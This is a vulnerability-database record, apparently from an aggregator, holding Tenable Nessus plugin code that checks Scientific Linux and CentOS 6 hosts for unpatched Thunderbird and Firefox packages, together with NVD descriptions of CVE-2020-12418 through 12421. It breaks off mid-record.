{"id": "SL_20200716_THUNDERBIRD_ON_SL6_X.NASL", "bulletinFamily": "scanner", "title": "Scientific Linux Security Update : thunderbird on SL6.x i386/x86_64 (20200716)", "description": "Security Fix(es) :\n\n - Mozilla: Information disclosure due to manipulated URL\n object (CVE-2020-12418)\n\n - Mozilla: Use-after-free in nsGlobalWindowInner\n (CVE-2020-12419)\n\n - Mozilla: Use-After-Free when trying to connect to a STUN\n server (CVE-2020-12420)\n\n - Mozilla: Add-On updates did not respect the same\n certificate trust rules as software updates\n (CVE-2020-12421)", "published": "2020-07-17T00:00:00", "modified": "2020-07-17T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/138586", "reporter": "This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?7fba4dd9"], "cvelist": ["CVE-2020-12419", "CVE-2020-12418", "CVE-2020-12420", "CVE-2020-12421"], "type": "nessus", "lastseen": "2020-12-04T05:51:28", "edition": 3, "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-12421", "CVE-2020-12418", "CVE-2020-12420", "CVE-2020-12419"]}, {"type": "redhat", "idList": ["RHSA-2020:2826", "RHSA-2020:2825", "RHSA-2020:3038", "RHSA-2020:2828", "RHSA-2020:2906", "RHSA-2020:3046", "RHSA-2020:2827", "RHSA-2020:2966", "RHSA-2020:2824", "RHSA-2020:2907"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-2824", "ELSA-2020-3038", "ELSA-2020-2828", "ELSA-2020-2966", "ELSA-2020-2827", "ELSA-2020-2906"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2020-2824.NASL", "CENTOS_RHSA-2020-2827.NASL", "ORACLELINUX_ELSA-2020-2824.NASL", "ORACLELINUX_ELSA-2020-2966.NASL", "SL_20200707_FIREFOX_ON_SL6_X.NASL", "CENTOS_RHSA-2020-2824.NASL", "GENTOO_GLSA-202007-09.NASL", "MACOS_THUNDERBIRD_68_10_0.NASL", "REDHAT-RHSA-2020-2966.NASL", "DEBIAN_DSA-4718.NASL"]}, {"type": "centos", "idList": ["CESA-2020:2824", "CESA-2020:2827"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310844495", "OPENVAS:1361412562310883259", "OPENVAS:1361412562310883260", "OPENVAS:1361412562310817211", "OPENVAS:1361412562310817212", "OPENVAS:1361412562310704718", "OPENVAS:1361412562310817213", "OPENVAS:1361412562310817210", "OPENVAS:1361412562310704713", "OPENVAS:1361412562310844488"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4713-1:114C2", "DEBIAN:DSA-4718-1:20552"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0967-1", "OPENSUSE-SU-2020:0983-1", "OPENSUSE-SU-2020:0982-1", "OPENSUSE-SU-2020:1017-1"]}, {"type": "gentoo", "idList": ["GLSA-202007-10", "GLSA-202007-09"]}, {"type": "amazon", "idList": ["ALAS2-2020-1468"]}, {"type": "kaspersky", "idList": ["KLA11829"]}, {"type": "ubuntu", "idList": ["USN-4408-1", "USN-4421-1"]}, {"type": "talos", "idList": ["TALOS-2020-1088"]}], "modified": "2020-12-04T05:51:28", "rev": 2}, "score": {"value": 6.4, "vector": "NONE", "modified": "2020-12-04T05:51:28", "rev": 2}, "vulnersScore": 6.4}, "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(138586);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/12/03\");\n\n script_cve_id(\"CVE-2020-12418\", \"CVE-2020-12419\", \"CVE-2020-12420\", \"CVE-2020-12421\");\n\n script_name(english:\"Scientific Linux Security Update : thunderbird on SL6.x i386/x86_64 (20200716)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Security Fix(es) :\n\n - Mozilla: Information disclosure due to manipulated URL\n object (CVE-2020-12418)\n\n - Mozilla: Use-after-free in nsGlobalWindowInner\n (CVE-2020-12419)\n\n - Mozilla: Use-After-Free when trying to connect to a STUN\n server (CVE-2020-12420)\n\n - Mozilla: Add-On updates did not respect the same\n certificate trust rules as software updates\n (CVE-2020-12421)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind2007&L=SCIENTIFIC-LINUX-ERRATA&P=3622\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7fba4dd9\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected thunderbird and / or thunderbird-debuginfo\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-12420\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:thunderbird-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 6.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"thunderbird-68.10.0-1.el6_10\", allowmaj:TRUE)) flag++;\nif (rpm_check(release:\"SL6\", reference:\"thunderbird-debuginfo-68.10.0-1.el6_10\", allowmaj:TRUE)) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"thunderbird / thunderbird-debuginfo\");\n}\n", "naslFamily": "Scientific Linux Local Security Checks", "pluginID": "138586", "cpe": ["p-cpe:/a:fermilab:scientific_linux:thunderbird", "p-cpe:/a:fermilab:scientific_linux:thunderbird-debuginfo", "x-cpe:/o:fermilab:scientific_linux"], "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "scheme": null}

{"cve": [{"lastseen": "2021-02-02T07:36:57", "description": "When processing callbacks that occurred during window flushing in the parent process, the associated window may die; causing a use-after-free condition. This could have led to memory corruption and a potentially exploitable crash. This vulnerability affects Firefox ESR < 68.10, Firefox < 78, and Thunderbird < 68.10.0.", "edition": 16, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-09T15:15:00", "title": "CVE-2020-12419", "type": "cve", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-12419"], "modified": "2020-07-27T02:15:00", "cpe": [], "id": "CVE-2020-12419", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-12419", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2021-02-02T07:36:57", "description": "When trying to connect to a STUN server, a race condition could have caused a use-after-free of a pointer, leading to memory corruption and a potentially exploitable crash. This vulnerability affects Firefox ESR < 68.10, Firefox < 78, and Thunderbird < 68.10.0.", "edition": 16, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-09T15:15:00", "title": "CVE-2020-12420", "type": "cve", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-12420"], "modified": "2020-07-27T02:15:00", "cpe": [], "id": "CVE-2020-12420", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-12420", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2021-02-02T07:36:57", "description": "When performing add-on updates, certificate chains terminating in non-built-in-roots were rejected (even if they were legitimately added by an administrator.) This could have caused add-ons to become out-of-date silently without notification to the user. This vulnerability affects Firefox ESR < 68.10, Firefox < 78, and Thunderbird < 68.10.0.", "edition": 16, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 3.6}, "published": "2020-07-09T15:15:00", "title": "CVE-2020-12421", "type": "cve", "cwe": ["CWE-295"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-12421"], "modified": "2020-07-27T02:15:00", "cpe": [], "id": "CVE-2020-12421", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-12421", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}, {"lastseen": "2021-02-02T07:36:57", "description": "Manipulating individual parts of a URL object could have caused an out-of-bounds read, leaking process memory to malicious JavaScript. This vulnerability affects Firefox ESR < 68.10, Firefox < 78, and Thunderbird < 68.10.0.", "edition": 16, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 3.6}, "published": "2020-07-09T15:15:00", "title": "CVE-2020-12418", "type": "cve", "cwe": ["CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-12418"], "modified": "2020-07-27T02:15:00", "cpe": [], "id": "CVE-2020-12418", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-12418", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": []}], "nessus": [{"lastseen": "2020-12-04T09:34:37", "description": "The remote CentOS Linux 6 host has a package installed that is affected by multiple vulnerabilities as referenced in the\nCESA-2020:2824 advisory.\n\n - Mozilla: Information disclosure due to manipulated URL object (CVE-2020-12418)\n\n - Mozilla: Use-after-free in nsGlobalWindowInner (CVE-2020-12419)\n\n - Mozilla: Use-After-Free when trying to connect to a STUN server (CVE-2020-12420)\n\n - Mozilla: Add-On updates did not respect the same certificate trust rules as software updates\n (CVE-2020-12421)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 7, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-07-10T00:00:00", "title": "CentOS 6 : firefox (CESA-2020:2824)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-12419", "CVE-2020-12418", "CVE-2020-12420", "CVE-2020-12421"], "modified": "2020-07-10T00:00:00", "cpe": ["cpe:/o:centos:centos:6", "p-cpe:/a:centos:centos:firefox"], "id": "CENTOS_RHSA-2020-2824.NASL", "href": "https://www.tenable.com/plugins/nessus/138378", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2020:2824 and\n# CentOS Errata and Security Advisory 2020:2824 respectively.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138378);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/12/03\");\n\n script_cve_id(\n \"CVE-2020-12418\",\n \"CVE-2020-12419\",\n \"CVE-2020-12420\",\n \"CVE-2020-12421\"\n );\n script_xref(name:\"RHSA\", value:\"2020:2824\");\n script_xref(name:\"IAVA\", value:\"2020-A-0287-S\");\n\n script_name(english:\"CentOS 6 : firefox (CESA-2020:2824)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote CentOS Linux host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote CentOS Linux 6 host has a package installed that is affected by multiple vulnerabilities as referenced in the\nCESA-2020:2824 advisory.\n\n - Mozilla: Information disclosure due to manipulated URL object (CVE-2020-12418)\n\n - Mozilla: Use-after-free in nsGlobalWindowInner (CVE-2020-12419)\n\n - Mozilla: Use-After-Free when trying to connect to a STUN server (CVE-2020-12420)\n\n - Mozilla: Add-On updates did not respect the same certificate trust rules as software updates\n (CVE-2020-12421)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://lists.centos.org/pipermail/centos-announce/2020-July/035776.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4717c6fd\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/200.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/296.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/416.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected firefox package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-12420\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_cwe_id(200, 296, 416);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CentOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/CentOS/release');\nif (isnull(release) || 'CentOS' >!< release) audit(AUDIT_OS_NOT, 'CentOS');\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'CentOS');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'CentOS 6.x', 'CentOS ' + os_ver);\n\nif (!get_kb_item('Host/CentOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'CentOS', cpu);\n\npkgs = [\n {'reference':'firefox-68.10.0-1.el6.centos', 'cpu':'i686', 'release':'CentOS-6', 'allowmaj':TRUE},\n {'reference':'firefox-68.10.0-1.el6.centos', 'cpu':'x86_64', 'release':'CentOS-6', 'allowmaj':TRUE}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'firefox');\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-01T12:40:32", "description": "Security Fix(es) :\n\n - Mozilla: Information disclosure due to manipulated URL\n object (CVE-2020-12418)\n\n - Mozilla: Use-after-free in nsGlobalWindowInner\n (CVE-2020-12419)\n\n - Mozilla: Use-After-Free when trying to connect to a STUN\n server (CVE-2020-12420)\n\n - Mozilla: Add-On updates did not respect the same\n certificate trust rules as software updates\n (CVE-2020-12421)", "edition": 5, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-07-08T00:00:00", "title": "Scientific Linux Security Update : firefox on SL6.x i386/x86_64 (20200707)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-12419", "CVE-2020-12418", "CVE-2020-12420", "CVE-2020-12421"], "modified": "2020-07-08T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:firefox", "p-cpe:/a:fermilab:scientific_linux:firefox-debuginfo", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20200707_FIREFOX_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/138205", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(138205);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/07/31\");\n\n script_cve_id(\n \"CVE-2020-12418\",\n \"CVE-2020-12419\",\n \"CVE-2020-12420\",\n \"CVE-2020-12421\"\n );\n script_xref(name:\"IAVA\", value:\"2020-A-0287-S\");\n\n script_name(english:\"Scientific Linux Security Update : firefox on SL6.x i386/x86_64 (20200707)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Security Fix(es) :\n\n - Mozilla: Information disclosure due to manipulated URL\n object (CVE-2020-12418)\n\n - Mozilla: Use-after-free in nsGlobalWindowInner\n (CVE-2020-12419)\n\n - Mozilla: Use-After-Free when trying to connect to a STUN\n server (CVE-2020-12420)\n\n - Mozilla: Add-On updates did not respect the same\n certificate trust rules as software updates\n (CVE-2020-12421)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind2007&L=SCIENTIFIC-LINUX-ERRATA&P=2340\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?be93fe2e\");\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected firefox and / or firefox-debuginfo packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-12420\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:firefox-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 6.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"firefox-68.10.0-1.el6_10\", allowmaj:TRUE)) flag++;\nif (rpm_check(release:\"SL6\", reference:\"firefox-debuginfo-68.10.0-1.el6_10\", allowmaj:TRUE)) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"firefox / firefox-debuginfo\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T17:30:55", "description": "From Red Hat Security Advisory 2020:2966 :\n\nThe remote Redhat Enterprise Linux 6 host has a package installed that is affected by multiple vulnerabilities as\nreferenced in the RHSA-2020:2966 advisory.\n\n - Mozilla: Information disclosure due to manipulated URL\n object (CVE-2020-12418)\n\n - 